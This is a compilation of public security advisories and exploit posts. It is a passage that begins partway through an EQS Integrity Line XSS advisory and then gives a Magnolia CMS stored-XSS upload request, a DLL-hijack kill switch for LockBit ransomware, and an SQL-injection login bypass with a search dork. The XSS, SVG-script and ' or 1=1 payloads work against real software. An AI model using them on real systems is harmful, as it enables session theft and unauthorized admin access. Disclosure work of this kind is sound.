whistleblowing questionnaire<br />implementation that enables anonymous, non authenticated, users to inject<br />malicious XSS vectors due to missing or improper input sanitization.<br />Also content security policies (CSP) that could prevent or limit the attack<br />are absent.<br /><br />The vulnerability is present on the whistleblowing form, and can be<br />triggered using the following example input:<br /><br />--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--<br /><br /><img src= onerror=alert(document.cookie)><br /> <br />--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--<br /><br />Due to the vulnerability, an attacker posing as a whistleblower could<br />upload an XSS vector in the submission form loading malicious code to be<br />reflected and executed in the context of the browser session of the<br />Recipient of the submission, that is typically an Anticorruption Officer<br />or an Internal Auditor.<br /><br />Being able to execute code in the context of the target, and due to the<br />absence of additional mitigations (e.g. the HttpOnly flag for cookies)<br />the attacker could possibly obtain a copy of the target session cookie<br />useful to impersonate and operate in place of the target user and<br />execute automated operations on behalf of the target user by accessing<br />all the reports present on the system or possibly impact the integrity<br />of the system by deleting reports or interfering with ongoing<br />communications with a real whistleblower.<br /><br />In short: a standard XSS attack scenario.<br /><br />The test for the presence of this vulnerability has been performed on the<br />first input only, to not risk to cause any damage to the application.<br />It is advised to execute a proper complete audit of the application with<br />respect to this kind of vulnerability.<br /><br />The vulnerability was first identified performing an independent security<br />audit to evaluate and ensure the security of the EU Sanctions Whistleblower<br />Tool of the European Commission enabling whistleblowers to report possible<br />violation of EU sanctions hosted at:<br /><br />https://eusanctions.integrityline.com/<br /> <br />B) Use of GET Request Method With Sensitive Query Strings [CWE-598]<br /><br />EQS Integrity Line through 2022-07-01 leaves sensitive traces in the browser<br />history of whistleblowers using the application and possibly in the logs<br />of other network appliances involved in the communication.<br /><br />When a whistleblower makes a submission, the system assigns a unique<br />identifier to the submission and enables to choose a pin that is intended<br />to be used by users in combination with the unique identifier to access<br />the system in order to communicate with the recipients of their own report.<br /><br />The implementation of the session makes use of GET variables that include<br />the unique identifier in the navigated URL to access the report.<br />Such an implementation is prone to sensible information leakage making it<br />possible for an auditor accessing the browser history of the<br />whistleblower's device to clearly identify the evidence of a performed<br />submission.<br /><br />It is advised to perform full review of the application to get sure that<br />the application reduces the sensible traces left in the browser history of<br />the user.<br /><br />IV. WORKAROUND<br /><br />The vendor has fixed the XSS and implemented a CSP in date 2022-07-01<br /><br />V. CVE INFORMATION<br /><br />XSS Vulnerability (stored) [CVE-2022-34007]<br />Use of GET Request Method With Sensitive Query Strings [CWE-598]<br /><br />VI. DISCLOSURE TIMELINE<br /><br />20220617 USH: Bugs discovered<br />20220617 USH: Contacted Mitre for CVE Assignment<br />20220621 USH: First vendor contact (Lorenzo Trevisiol, Laura Santeusanio)<br />20220622 USH: Advisory provided to the vendor (Goran Kozomara)<br />20220701 Vendor response: XSS confirmed and CSP implemented (Marco Ermini)<br /> The vendor does not acknowledge the second reported vulnerability<br /> in the specific context of use but has planned future improvement<br /> the application of the application replacing the GET request with<br /> a POST request.<br />20220701 USH: The team confirms prompt and effective remediation of the<br /> XSS vulnerability but points out suboptimal CSP implementation.<br /> The implementation seems to involve a central proxy or device and<br /> to always include a list of 10 vendor clients and other third<br /> parties CDN probably used for other reasons different from the<br /> audited integrity line app (e.g. bootstrap CDN). The team advises<br /> to implement a policy per-site and app to avoid listing sensible<br /> resources and limit any possible exposure.<br />20220701 Advisory release scheduled for 20220706<br />20220706 Advisory released<br /><br />VII. REFERENCES<br /><br />[1] EQS Integrity Line: Multiple Vulnerabilities<br /> http://www.ush.it/team/ush/advisory-eqs-integrity-line/eqs_integrity_line.txt<br /><br />VIII. CREDIT<br /><br />Giovanni Pellerano, is credited with the discovery of this vulnerability.<br /><br />Giovanni Pellerano<br />web site: http://www.ush.it/<br />mail: evilaliv3@ush.it<br /><br />IX. LEGAL NOTICES<br /><br />Copyright (c) 2022 Giovanni Pellerano<br /><br />Permission is granted for the redistribution of this alert<br />electronically. It may not be edited in any way without mine express<br />written consent. If you wish to reprint the whole or any<br />part of this alert in any other medium other than electronically,<br />please email me for permission.<br /><br />Disclaimer: The information in the advisory is believed to be accurate<br />at the time of publishing based on currently available information. Use<br />of the information constitutes acceptance for use in an AS IS condition.<br />There are no warranties with regard to this information. Neither the<br />author nor the publisher accepts any liability for any direct, indirect,<br />or consequential loss or damage arising from use of, or reliance on,<br />this information.<br /><br /></code></pre>
<pre><code># Exploit Title: Magnolia CMS <= 6.2.19 - Stored Cross-Site Scripting (XSS)<br /># Date: 08/05/2022<br /># Exploit Author: Giulio Garzia 'Ozozuz'<br /># Vendor Homepage: https://www.magnolia-cms.com/<br /># Software Link: https://nexus.magnolia-cms.com/service/local/repositories/magnolia.public.releases/content/info/magnolia/bundle/magnolia-community-demo-webapp/6.2.19/magnolia-community-demo-webapp-6.2.19-tomcat-bundle.zip<br /># Version: 6.2.19<br /># Tested on: Linux, Windows, Docker<br /># CVE : CVE-2022-33098<br /><br />Explanation<br />Malicious user with the permissions to upload profile picture for a contact, can upload an SVG file containing malicious JavaScript code that will be executed by anyone opening the malicious resource.<br /><br />===== REQUEST =====<br />POST /magnoliaAuthor/.magnolia/admincentral/APP/UPLOAD/0/140/action/cba61868-b27a-4d50-983d-adf48b992be1 HTTP/1.1<br />Host: 127.0.0.1:8080<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------399178799522967017241464837908<br />Content-Length: 620<br />Connection: close<br />Cookie: csrf=_WLVhBj-Vv-sdc37C4GBahMJ1tPS_7o_Y1VCEEw18Ks; JSESSIONID=F2678A586264F811C2746E4138BEF34D<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: iframe<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------399178799522967017241464837908<br />Content-Disposition: form-data; name="140_file"; filename="xss.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert('POC - Magnolia CMS');<br /> </script><br /></svg><br /><br />-----------------------------399178799522967017241464837908--<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/38745539b71cf201bb502437f891d799_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Ransom Lockbit 3.0 <br />Vulnerability: Code Execution<br />Description: The ransomware apparently now requires a password to execute as noted by "@vxunderground" E.g. "-pass db66023ab2abcb9957fb01ed50cdfa6a". Lockbit looks for and executes DLLs in its current directory. Therefore, we can hijack a vuln DLL in this case "RstrtMgr.dll", execute our own code and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Lockbit<br />Type: PE32<br />MD5: 38745539b71cf201bb502437f891d799<br />Vuln ID: MVID-2022-0621<br />Disclosure: 07/04/2022<br />Video PoC URL: https://www.youtube.com/watch?v=tAXrRcsnzjY<br /><br />Exploit/PoC:<br />1) Compile the following C code as "RstrtMgr.dll"<br />2) Place the DLL in same directory as Lockbit 3.0<br />3) Optional - Hide it: attrib +s +h "RstrtMgr.dll"<br />4) Run Lockbit 3.0 {04830965-76E6-6A9A-8EE1-6AF7499C1D08}.exe -k LocalServiceNetworkRestricted -pass db66023ab2abcb9957fb01ed50cdfa6a<br /><br /><br />#include "windows.h"<br /><br />//By malvuln - 7/4/2022<br />//Purpose: RCE in Lockbit 3.0 ransomware<br />//MD5: 38745539b71cf201bb502437f891d799<br />//gcc -c RstrtMgr.c -m32<br />//gcc -shared -o RstrtMgr.dll RstrtMgr.o -m32<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Ransom Lockbit 3.0 aka LockShit\nPWNED by Malvuln", "Code Exec PoC", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> if(GetCurrentDirectory(MAX_PATH, buf))<br /> if(strcmp("C:\\Windows\\System32", buf) != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Advanced Testimonials Manager v5.6 Auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | <br />| # Vendor : https://codecanyon.net/item/advanced-testimonials-manager/113257?s_rank=194 | <br />| # Dork : Advanced Testimonial Manager |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : user & pass = ' or 1=1 limit 1 -- -+<br /><br />[+] http://127.0.0.1/testimonials/admin/index.php<br /><br />==Greetings to :=========================================================================================================================<br />| |<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* thelastvvv *Zigoo.eg * moncet |<br />| |<br />=========================================================================================================================================<br /></code></pre>